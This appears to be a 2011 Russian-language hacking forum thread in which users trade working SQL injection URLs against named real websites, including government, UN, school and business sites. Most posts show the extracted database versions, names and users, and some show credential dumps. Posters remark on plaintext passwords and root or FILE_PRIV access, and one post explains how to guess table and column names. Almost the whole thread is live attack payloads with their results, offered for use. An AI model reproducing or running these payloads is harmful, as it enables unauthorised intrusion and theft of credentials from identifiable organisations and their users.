http://www.hillsrugbyleague.com.au/content.php?id=-88+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),database(),user())+--+
5.0.91-community-log:hillsrug_eberos:hillsrug_dba@localhost
pr 4
http://www.labiosthetique.com.au/content.php?id=-89'+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,0,11,12,13,14,15,16,17+--+
4.1.22:labio:labio@localhost
pr 6 тиц 10
http://www.drummuster.com.au/category.php?id=53+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+
164 таблици %)
5.0.51a-24+lenny1:agsafe:agsafe@localhost
pr 4
http://www.bearcage.com.au/content.php?id=102'+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+
5.0.51a-24+lenny1:bearcage:bearcage@localhost
[COLOR=Green]ROOT[/COLOR]
так и не смог сюда шелл залить
pr5
http://www.ausvet.com.au/content.php?page=gallery&id=-210+union+select+concat_ws(0x3a,version(),database(),user())+--+
5.0.85:ausvet:angus@localhost
pr 1
http://www.dancekinetic.com.au/content.php?id=-1'+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,0+--+
5.0.32-Debian_7etch5~bpo31+1:freephone_dancek:freephone_dancek@supremecenter20.com
pr 4
http://www.registriesplus.ca/content.php?id=-3+union+select+concat_ws(0x3a,version(),database(),user())%20%20+--+
5.0.92-community:regplus_regplus:regplus_dbm@localhost
pr 6
http://www.congress2010.ca/content.php?id=-539+union+select+1,2,3,4,5,6,7,8,9,0,11,12,concat_ws(0x3a,version(),database(),user()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
5.0.84-0.dotdeb.0-log:FAQ_cfhss:fedcan2@localhost
Osstudio
30.05.2011, 14:08
http://www.marbel.ru/news/sob.php?id=44+and+1=0+union+select+1,2,3,database%28%29,version%28%29,6--
тИц 80
winstrool
30.05.2011, 18:12
pr 2[COLOR=DarkGreen]ROOT[/COLOR]
прочтите вниматильней ошибку :D
http://www.markthatsold.ca/content.php?id=1912+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),user(),0x596f75207265636c616d613a29)),1,63),+FLOOR(RAND(0)*2)))
5.0.92-community:real_adminnewtemp:real_admin@rc3-int
http://www.snarfy.ca/content.php?id=2+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID(concat_ws(0x3a,version(),database(),user()),1,63),+FLOOR(RAND(0)*2)))+--+
4.1.25-log:snarfy_main:snarfy_snarfy@localhost
pr 3
http://www.gatewaymechanical.ca/content/subindex.php?id=9+union+select+concat_ws(0x3a,version(),database(),user()),2+--+
4.1.22-log:gateway2_cms:pantera@localhost
Cennarios
30.05.2011, 18:26
https://[COLOR=DarkOrange]unfccc.int/cc_inet/cc_inet/six_elements/international_cooperation/items/3527.php?displayPool=-984+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,group_concat%28schema_name%29,31,32,33,34,35,36,37+from+information_schema.schemata[/COLOR]--+&lang=10%27
http://www.board.ivki.com/index.php?id_categ=-15%20and%201=2%20union%20select%201,2,3,4,5,6,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
[COLOR=Sienna]5.1.53-LOG DOSKA@LEPKE.DREAMHOST.COM IVKI_BOARD PC-LINUX-GNU[/COLOR]
winstrool
31.05.2011, 10:12
pr 5 тиц 10
http://www.pec.on.ca/bloomfield/content.php?id=-1'+union+select+1,concat_ws(0x3a,version(),database(),user())+--+4.1.22-log:gateway2_cms:pantera@localhost
4.0.26:pec_on_ca_simplecms:peconc@pec.on.ca
pr 1
http://www.eastviewschool.ca/content.php?ID=-41+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
5.0.22-Debian_0ubuntu6.06.11-log:Eastview:Eastview@localhost
pr 3
http://www.ste-ca.org/content.php?id=-100+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())+--+
5.0.92-community:ste_site:ste_web@localhost
http://www.zoomprinting.ca/content.php?id=-5'+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,0,11,12+--+
5.1.36-community-log:zoomprinting:root@localhost
http://www.coshuk.com/html/news.php?ID=-47+UnIon+selECt+1,2,3,4,CONCAT%28user%28%29,%20CHAR%2832,45,32%29,%20version%28%29%29,6,7,8,9,10+--+
coshadmin@localhost - 5.0.51a-community-log
shop
http://www.proformancelogo.com/product.php?id=-317+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
http://www.dallasmustang.com/product.php?productid=1124+and+row%281,2%29in%28select+count%28*%29,concat%28%28select+table_name+from+information_schema.tables+limit+3,1%29,0x3a,floor%28rand%280%29*2%29%29as+a+from+information_schema.tables+x+group+by+a%29
http://www.wislaportal.pl/news.php?id=-20193'+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14+from+information_schema.tables+--+
[COLOR=PaleGreen]PR 4[/COLOR]
[COLOR=Black]Какой то польский футбольный клуб чтоли.[/COLOR]
Cennarios
03.06.2011, 04:16
http://[COLOR=DarkOrange]www.platinum-hosting.net/index.php?page=-contact%27+union+select+1,2,user%28%29,4,5,6[/COLOR]--+
http://www.torry.net/news.php?id=26
Host IP: 209.160.73.163
Web Server: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.8e DAV/2 PHP/5.3.3 with Suhosin-Patch
Powered-by: PHP/5.3.3
DB Server: MySQL >=5
Яндекс тИЦ (CY) 160
Alexa Rank 123,675
Google PageRank (PR) 3
завтра еще дам. тут я не смог таблицу подобрать.
тут у нас блинд
shell_c0de
05.06.2011, 03:15
2OnlyOn прочитай первый пост =\
[QUOTE=shell_c0de]2OnlyOn прочитай первый пост =\[/QUOTE]
Первую удалил.
По правилам вроде-бы все дальше ок. не боян. Указал инфу.
Подобрать таблицу и БД не получилось
Федеральная служба Российской Федерации по контролю за оборотом наркотиков
http://www.65.fskn.gov.ru/show_doc.php?id=-1+union+select++1,2,3,4,group_concat%280x3a,table_name%29,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=0x73616b68706f6c696365+--+
version: 5.0.82sp1-log
database: sakhpolice
user: sakhpolice@localhost
tables
banners,docs,faq,faq_n,gallery,users,vacancy,vote,vote_answers,vote_variants,wanted
пароли в открытом виде
Target: http://ru.apa.az/news.php?id=154498
Host IP: 85.132.71.138
Web Server: nginx admin
Powered-by: PHP/5.2.17
DB Server: MySQL
Current DB: apaadm_ru
Data Bases: information_schema
apaadm_am
apaadm_ar
apaadm_az
apaadm_en
apaadm_fr
apaadm_ru
apaadm_statistika
apaadm_video
apaadm_videoen
apaadm_videoru
Data Bases: information_schema
apaadm_am
apaadm_ar
apaadm_az
apaadm_en
apaadm_fr
apaadm_ru
apaadm_statistika
apaadm_video
apaadm_videoen
apaadm_videoru
Раскрытие путей:
/home/apaadm/public_html/ru/news.php
тИЦ 800, PR 6
http://www.xram-novatorov.ru/page.php?id='+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x3a,version(),database(),user())+from+INFORMATION_SCHEMA.TABLES+limit+0,1),1,64),floor(rand(0)*2)))z)--+
bloodAngel
05.06.2011, 21:19
http://www.avantage.spb.ru/catalog.php?ID=-28+union+select+1,version(),3,4,5,6--
5.0.77-log
Яндекс тИЦ 10
Яндекс Rank 2/6
Google PageRank 3/10
http://www.domivka.dp.ua/catalog.php?cat=1%20or(1,2)=(select*from(select%20name_const(version(),1),name_const(version(),1))a)
'5.0.91-community'
Яндекс тИЦ 10
Яндекс Rank 2/6
Google PageRank 1/10
http://uprava.org/section.php?id=19&sub_id=-167%20and%201=2%20union%20select%201,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os)+--
[COLOR=Sienna]4.0.27-log uprava-org@fhe2.hoster.ru uprava-org portbld-freebsd7.0[/COLOR]
http://eurozvuk.ru/gallery/index.php?id=999999.9%27+UNION+ALL+SELECT+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536+and+%27x%27%3D%27x
Target: http://eurozvuk.ru/gallery/index.php?id=2384
Host IP: 77.222.40.186
Web Server: Apache/2.0.63-lk.d (Unix) mod_ssl/2.0.63-lk.d OpenSSL/0.9.8o mod_dp20/0.99.2 mod_python/3.3.1 Python/2.6.6 mod_ruby/1.2.6 Ruby/1.8.7(2010-08-16) mod_wsgi/3.3
DB Server: MySQL >=5
Resp. Time(avg): 475 ms
Current User: eurozvuk@localhost
Sql Version: 5.1.50-lk-log
Current DB: eurozvuk
System User: eurozvuk@localhost
Host Name: mesa
Installation dir: /usr/
Яндекс тИЦ (CY) 70
Google PageRank (PR) 3
http://gretta.ru/catalog/card.php?cat=palio&id=999999.9%27+UNION+ALL+SELECT+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--+a
Target: http://gretta.ru/catalog/card.php?cat=palio&id=1636
Host IP: 78.110.50.127
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 205 ms
Current User: icy0u3fz_gal2@c25-w.ht-systems.ru
Sql Version: 5.0.85-log
Current DB: icy0u3fz_gal2
System User: icy0u3fz_gal2@c25-w.ht-systems.ru
Host Name: db14.ht-systems.ru
Installation dir: /usr/local/
DB User: 'icy0u3fz_gal2'@'%'
Data Bases: information_schema
icy0u3fz_gal2
Яндекс тИЦ (CY) 100
Google PageRank (PR) 2
http://landscrona.ru/tales/index.php?id=999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536%2Cconcat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
Target: http://landscrona.ru/tales/index.php?id=125
Host IP: 93.100.182.251
Powered-by: PHP/5.2.6-1+lenny10
Web Server: lighttpd/1.4.19
DB Server: MySQL >=5
Resp. Time(avg): 325 ms
Current User: ultrspru_data@localhost
Sql Version: 5.0.51a-24+lenny5
Current DB: ultrspru_data
System User: ultrspru_data@localhost
Host Name: landscrona
Installation dir: /usr/
DB User: 'ultrspru_data'@'localhost'
Data Bases: information_schema
ultrspru_data
Яндекс тИЦ (CY) 160
Google PageRank (PR) 3
http://resurs.ua/index.php?id=2&more=21+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+1%3D1
Target: http://resurs.ua/index.php?id=2&more=21
Host IP: 91.197.128.231
Powered-by: PHP/5.2.13
Web Server: lighttpd/1.4.26
DB Server: MySQL error based
Resp. Time(avg): 80 ms
Sql Version: 5.0.77
Current DB: resursbase
Host Name: amgroup01.art-hosting.net.ua
Installation dir: /usr/
Яндекс тИЦ (CY) 30
Google PageRank (PR) 2
Тут БД с логин-пасс в открытом виде. Наслаждайтесь. Пару мыльников попалось с довольно таки крутыми доменами XD
http://www.benzrealty.com.au/content.php?page_id=-8+/*!UnIon+selECt+version%28%29*/
5.1.52
Cennarios
07.06.2011, 20:15
http://[COLOR=DarkOrange]crime-maps.org/documentation_centre/centre/newsletter/newsletter_issue.php?i_=-45+union+select+1,concat%28file_priv,0x3a3a,User%29,3+from+mysql.user+limit+0,1[/COLOR]--+&a_=395
Таким образом подбираем существующую таблицу:
http://www.photoindustria.ru/?mod=contest&id=14+union+select+null,null,null,null,null,null+from+ABCDEF Если ABCDEF заменить на USERS - запроспроходит.
Далее подбираем поля:
http://www.photoindustria.ru/?mod=contest&id=14+union+select+users.pass,null,null,null,null,null+from+usersЕсли вместо pass написать password - запрос проходит.
http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,version%28%29,database%28%29,user%28%29,@@version_compile_os%29,10,%2011,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+--+
winstrool
09.06.2011, 03:25
pr5 ТИЦ 20
http://www.fenetreeurope.com/php/page.php?section=actu&id=-21190%27+union+select+1,2,3,4,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,6,7+--+
fenetreeurope@localhost:5.0.45:dbfenetreeurope
pr1
http://buket-iz-konfet.com.ua/pages.php?page=14+union+select+1,2,3,concat_ws(0x3a,user(),version(),database())+--+
buketizkonfet@localhost:5.1.51:buketizkonfet
pr2
http://tonometr-shop.com.ua/pages.php?page=13+union+select+1,2,3,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29--
buketizkonfet@localhost:5.1.51:buketizkonfet
http://www.kharkovapartment.com.ua/order.php?id=17000+union+select+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29+--+
kharkovapartment@localhost:4.0.27:kharkovapartment
https://www.davidrayrobinson.com/order.php?id=-1+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID%28%28select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%29,1,63%29,+FLOOR%28RAND%280%29*2%29%29%29--+
drobinson@localhost:5.0.27:business_data
http://www.mogilev.biz/company/?r=-17%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--
[COLOR=Sienna]5.1.44-community-log shuniamogilev@localhost mogilevbiz_mogilev unknown-linux-gnu[/COLOR]
SpaceMan
09.06.2011, 21:00
http://www.white-ship.ru/index.php?id=7-999.9+union+select+1,2,3,version%28%29,5,6,7,8,9,10--
вывод в Title :)
SergioRezza
10.06.2011, 09:55
http://www.be-on.net/products.php?id=-230+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
http://www.dfki.de/lt/card.php?id=-94+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
http://housewives.org.ua/text.php?id=-692+union+select+1,2,3,4,version()--
http://jericho.org.ua/text.php?id=-682+union+select+1,2,3,4,version()--
http://www.tradevoyage.by/new.php?id=-142+union+select+1,2,3,4,version(),6,7,8,9,10--
http://www.thaiware.com/main/info.php?id=-2955+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
http://bolshevik-bowling.com.ua/info.php?id=-2+union+select+1,2,version()--
http://www.microchip.by/info.php?id=-1106+union+select+1,2,3,version(),5--
http://www.gammabook.ru/news.php?id=-82+union+select+1,concat_ws(0x3a,id,name,password),3,4,5,6+from+users--
http://www.stinkyjournalism.org/editordetail.php?id=-671+union+select+1,concat_ws(0x3a,admin_id,admin_name,admin_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin--
http://www.garo.cc/item.php?id=-879+union+select+1,2,version(),4,5,6,7,8,9,10,11,12
http://www.noborder.org/item.php?id=-383+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
позже выложу "сочные"
SergioRezza
10.06.2011, 10:32
http://adu.org.za/staff_page.php?staff_id=-31+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--
http://www.jumbocast.net/staffdetails.php?staff_id=-2+union+select+1,2,3,version(),5,6,7,8,9,10,11--
http://www.milim.com/gallery.php?id=-163+union+select+1,version(),3,4--
http://www.r31-rabota.ru/index.php?id=-75%20and%201=2%20union%20select%201,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4+--
[COLOR=Sienna]5.1.54 r31-rabota@localhost r31-rabota portbld-freebsd8.1[/COLOR]
winstrool
10.06.2011, 14:35
pr3 тиц 10
http://www.ticketon.ru/places.php?id=15700000000+union+select+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8+from+sbilet_users+--+
u73487@10.8.0.216:5.0.90-log:u73487
pr3 тиц 60
http://mospf.ru/order.php?id=-1+union+select+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5+--+
mospf_ru@zvm7.host.ru:5.0.92-log:mospf_ru
http://www.antiquesincanada.com/shop.php?myID=-398 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
http://www.lifesaving.org/image_shop_lrg.php?article_id=-41 union select 1,version()--+
Обязателен рефер с сайта.
http://www.karmavore.ca/shop.php?pcatid=7&cat=-87 union select version()--+
http://www.flyermall.com/community/msg_preview.html?cid=-15%20union%20select%201,version%28%29,3--+
SergioRezza
11.06.2011, 14:32
http://www.simbin.se/news.php?newsid=-153+union+select+1,concat_ws(0x3a,ID,USERNAME,PASSWORD),3,4,5+from+USERS+where+ID=15--
nemaniak
12.06.2011, 01:49
[COLOR=Green]virtualjerusalem.com PR-7[/COLOR]
http://www.virtualjerusalem.com/news.php?Itemid=3147+and+substring((select+version()),1,1)=5+--+
[COLOR=Green]njsa.com PR-5[/COLOR]
http://www.njsa.com/memoview.php?newsid=-194+union+select+1,2,3,4,concat_ws(version(),user(),database()),6,7,8,9,10+--+
70776_njsa@lnh-www1e.bluehalo.myregisteredsite.com5.0.7770776_njsa
bloodAngel
12.06.2011, 14:18
http://www.ashbyschool.org.uk/news/news_view.php?id=105-999.9+union+select+1,version%28%29,database%28%29,4,5,6,7,8--
4.1.22-log ashbyschooldb
Пр 4
http://www.javaportal.ru/books/aboutbook.php?id=30-999.9+union+select+1,database%28%29,version%28%29,4,5,6,7,8,9,10,11,12--
Тиц 100 Пр 4
http://www.globalfutureevents.com/event.php?id=-487+union+select+1,2,3,version(),database(),user(),7--
5.1.57 / fesu_db / fesu_usr@localhost
Тиц10 Пр 3
SergioRezza
12.06.2011, 15:58
http://colortek.by/show.php?id=434&t=-13+union+select+version()--
http://www.chgk.com.ru/person.php?id=-49+union+select+1,2,concat_ws(0x3a,name,pass),4,5,6,7+from+user--
http://lit.phil.pu.ru/person.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,name,password),8+from+users--
http://hotel-escort.ru/person.php?id=-59+union+select+1,2,3,4,version(),6,7--
http://www.mebelinfo.ru/base.php?tip=4&id=-34+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
http://fikomed.ru/base.php?id=-8+union+select+1,2,version(),4,5--
byte.catcher
12.06.2011, 19:26
http://www.riff-fanzine.com/InfoArticulo.php?idArticulo=63-999.9+union+select+1,version(),3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
SergioRezza
12.06.2011, 19:46
[COLOR=Teal]тИЦ 30[/COLOR]
http://stairsoflove.ru/write.php?id=-36271+union+select+1,2,3,version(),5,6--
[COLOR=Teal]тИЦ 10[/COLOR]
http://heartmir.ru/write.php?id=-360+union+select+1,version(),3,4,5--
[COLOR=Teal]тИЦ 30[/COLOR]
http://moy-snegovik.ru/write.php?id=-11910+union+select+1,2,3,version(),5,6--
[COLOR=Teal]тИЦ 10[/COLOR]
http://www.usadiba.ru/dom.php?id=-468+union+select+version(),2,3,4,5,6,7,8--
http://slanger.ru/?mode=library&sl_id=-1095+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables+--+
тИЦ: 30 PR: 3
[COLOR=PaleTurquoise]Вывод под датой[/COLOR]
http://www.worstpreviews.com/headline.php?id=-16827+union+select+1,2,3,version(),5,6,7,8+--+
[COLOR=PaleTurquoise]Не могу раскрутить[/COLOR]
http://www.vizzed.com/vizzedboard/thread.php?id=4290'
CodeSender:)
14.06.2011, 09:09
http://tajik-gateway.org/index.phtml?lang=ru&id=-535+union+select+version(),2--+
http://kluchbulgaria.com/index.php?menu=12&lang=ru&id=1246+union+select+1,2,version(),4,5--+
http://stylink.ru/kolgotky/index.html?action=sl&id=5258+UnIon+selECt+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+
http://stroika.md/detail.php?id=1+UnIon+selECt+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+
http://tdlotos.com.ua/prod.php?id=-447+UnIon+selECt+1,concat_ws(0x3a,email,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users--+
http://russtyle-yug.ru/catalog.php?id=59302%27+union+select+concat_ws(0x3a,login,pass),2+from+tbl_users--+
http://prokatavto.com.ua/index.php?page=order&id=42+UnIon+selECt+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=0x68636c5f6f70657261746f7273--+
http://julietta.com.ua/index.php?r=3&c=3&id=-84+union+select+version(),2--+
http://ulgaz.ru/index.php?mode=news&id=-184+union+select+concat_ws(0x3a,login,pass),2,3+from+users--+
Корпоративный сайт ООО "Ульяновскоблгаз"
http://www.semes.org/sociedades_detalle.php?id=-13+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database())+from+information_schema.columns--
semes@localhost:5.0.51a-24+lenny5
http://www.north-southglobal.org/conferencias/info_organigrama.asp?ID=-1+union+select+*+from+msysobjects+in+'.'
http://www.2coma11.com/img_proyecto.php?id=-66+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5--&refresh=
coma11@localhost:5.1.32-log:bdcoma11
http://www.tyeg.tw/web_news_c_2.php?top_id=-2019+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(0x3a,user(),version(),database()),24,25,26,27,28--
tyeg@localhost:5.0.77:tyeg
http://w3.tyh.com.tw/medweb/php/drugchange.php?id=-824+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,0--
his@localhost:4.0.21-log:tyh
Cennarios
16.06.2011, 06:31
http://ozone.unep.org/new_site/en/notes.php?country_id=1%29+union+select+1,2,unhex%28hex%28user%28%29%29%29--+
http://www.mir-tv.ru/help.php?id=-2+UNION+SELECT+1,2,version%28%29,4--
5.1.41-log
http://www.position1.ru/index-1.php?id=-46+UNION+SELECT+1,2,3,version%28%29,5--
5.0.90
тИЦ CY 80
PR 2
http://www.bolshie.ru/help.php?id=-4+union+select+1,2,3,4,version%28%29--
5.0.90-log
SergioRezza
18.06.2011, 13:49
http://www.elportal.ru/stat.php?id=-62+union+select+version()--
тИЦ 20
5.0.85-log
_________________________________
http://www.facebookcounter.ru/stat.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9--
5.0.91
________________________________
http://www.skladobzor.ru/stat.php?id=-23+union+select+version()--
тИЦ 10
5.0.85-log
_______________________________
http://www.pogruzchikservice.ru/index.php?t=stat&id=-4+union+select+version()--
[COLOR=Red]тИЦ: 60[/COLOR]
5.0.85-log
______________________________
http://www.itkt.ru/prod.php?id=-40+union+select+version()--
[COLOR=DarkOrange]тИЦ: 40[/COLOR]
4.1.25-log
Atarvala
18.06.2011, 16:56
http://penzlyk.com/biography.php?arts=10+and+1=0+union+select+concat_ws(0x3a3a3a,user(),database(),version())+--+
kravchluba_baza@localhost:::kravchluba_penzlyk:::5.0.67-community
http://www.plantdesignsolutions.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,COnCat_WS(0x3a,version(),user(),database()),5,6,7,8
5.0.91-log: : plantdesignusr@97.74.24.46: : plantdesignusr
http://www.ibis.dk/presse/showarticle.php?id=-4256++UnIoN+AlL+sElEcT+CONCAT_WS(CHAR(32,58,32),user(),database(),version())--
@localhost : ibis_web : 5.0.22-Debian_0ubuntu6.06.15-log
winstrool
18.06.2011, 22:20
тиц 30
http://www.captainsofcrush.ru/grippers/info.php?id=-13+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8+--+
5.0.91-community:captains_crush@localhost:captains_crush
pr2 тиц 20
http://www.medium-plus.ru/print.php?in=-22+union+select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,2,3+--+&ac=info&m1=2&m2=6
medium-plus@localhost:5.0.77:medium-plus
pr4 тиц 140
http://www.itrex.ru/index.php?option=com_itrexptc&ptcPage=tr&id=-707%27+and+1=1+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID%28%28select+concat%28user%28%29,0x3a,version%28%29,0x3a,database%28%29%29%29,1,63%29,+FLOOR%28RAND%280%29*2%29%29%29+--+
itrexru@localhost:5.0.77:itrex_db
http://www.gumata.com/product.php?id=-47+union+select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29+--+
gumata_gumata@localhost:5.0.92-community:gumata_gumata
pr6 тиц 190
http://ndce.edu.ru/publ_info.php?id=-78+union+select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16--
lab130@localhost:5.0.91-log:catalogue
[COLOR=DarkGreen]FILE_PRIV=Y[/COLOR]
pr4
http://www.ditc.us/news-events/articles/article.php?id=-100+union+select+1,2,3,4,5,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,7,8,9,0,11,12,13,14,15,16,17,18,19,0,21,22,23,24--
ditcus@76.12.19.204:5.0.27-standard:ditcus
тиц:160 пр4
http://www.nukri.org/index.php?module=Recipes&func=display&lid=-4+union+select+1,unhex%28hex%28concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%29%29,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18+--+
nukri2@localhost:4.1.18-standard:db_nukri2
[COLOR=DarkGreen]уников в день 1500[/COLOR]
pr5
http://www.thecis.ca/index.php?catID=38&itemID=4690000000+union+select+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
cistudies@localhost:5.1.56-rs:cistudies
pr1
http://www.yaptik.biz/modules/articles/article.php?id=114+union+select+1,2,3,4,5,6,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,8,9,0,11,12,13,14,15,16,17,18,19,20--
ycolasan_biz@localhost:5.1.54-log:ycolasan_biz.
pr5
http://www.baltwashchamber.org/content.php?sid=2&id=50&content=3&parentid=65+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+--+
bwcctest@204.13.10.22:aimstar_bwcccms:5.1.24-rc-log
pr3 тиц 30
http://www.svvm-auto.ru/info.php?id=-11+union+select+1,2,3,4,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,6,7+--+
zorro_svvm@localhost:zorro_svvm:5.0.51a-24+lenny4-log
Cennarios
19.06.2011, 03:31
http://[COLOR=DarkOrange]www.iaea.org/nael/page.php?page=2125&recordID=-28/**//*!union*//**//*!select*//**/1,user%28%29,3,4,5,6,7,8,9,10[/COLOR]--+
http://stepstation.com/posts.php?category=-11+union+select+1,concat_ws(0x3a,email,password),3,4,5+from+users--
---
http://www.estatefiesolana.it/index.php?id=-597+union+select+1,concat_ws(0x3a,user,password),3,4,5+from+mysql.user--
winstrool
19.06.2011, 15:52
тиц 50
http://www.talas-m.ru/info.php?id=-9+union+select+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5+--+&t=resort
talasm01@localhost:5.1.56-log:wwwtalasmru_talasm01
тиц 10 pr2
http://www.otalant.ru/info.php?id=-7%27+union+select+1,2,3,4,5,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,7,8,9,0,11,12,13,14,15,16,17+--+
akademiach@localhost:5.0.26-lk-log:akademiach
тиц 20
http://www.vetclin.ru/article.php?id=-2%27+union+select+1,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+--+
zubov@localhost:zubov517:5.0.67
тиц 40 pr3
http://www.itkt.ru/prod.php?id=-40+union+select+concat_ws(0x3a,user(),version(),database())+--+
itktru99_itkt@localhost:4.1.25-log:itktru99_itktru
http://topnexia.ru/arcticles.php?id=-41+union+select+1,version%28%29,3,4,5+--+
version: 5.0.26-log
